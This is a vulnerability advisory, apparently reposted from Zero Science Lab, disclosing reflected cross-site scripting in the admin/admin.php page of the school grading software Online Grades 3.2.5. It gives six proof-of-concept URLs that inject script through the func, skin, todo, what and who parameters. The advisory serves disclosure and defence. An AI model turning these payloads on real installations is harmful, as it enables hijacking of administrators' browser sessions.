Online Grades Project Team 3.2.5 Cross Site Scripting

Risk: Low
Local: No
Remote: Yes

Online Grades 3.2.5 Multiple XSS Vulnerabilites Vendor: Online Grades Project Team Product web page: Affected version: 3.2.5 Summary: Online Grades is the leading free-software project that allows K-12+ student grades attendance information to be posted onto a dynamic web site. Desc: Online Grades suffers from multiple cross-site scripting vulns. The issue is triggered when input passed via multiple parameters to the 'admin/admin.php' script is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Microsoft Windows XP Professional SP3 (EN) Apache 2.2.14 (Win32) PHP 5.3.1 MySQL 5.1.41 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2011-5029 Advisory URL: 22.07.2011 --- http://localhost/admin/admin.php?func=1"><script>alert(1)</script>&skin=classic http://localhost/admin/admin.php?func=0&skin=1"><script>alert(1)</script> http://localhost/admin/admin.php?func=0&todo=1"><script>alert(1)</script> http://localhost/admin/admin.php?func=0&what=1"><script>alert(1)</script>&who=Faculty http://localhost/admin/admin.php?func=0&what=mail&who=1"><script>alert(1)</script> http://localhost/admin/admin.php/>"><script>alert(1)</script>


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022,


Back to Top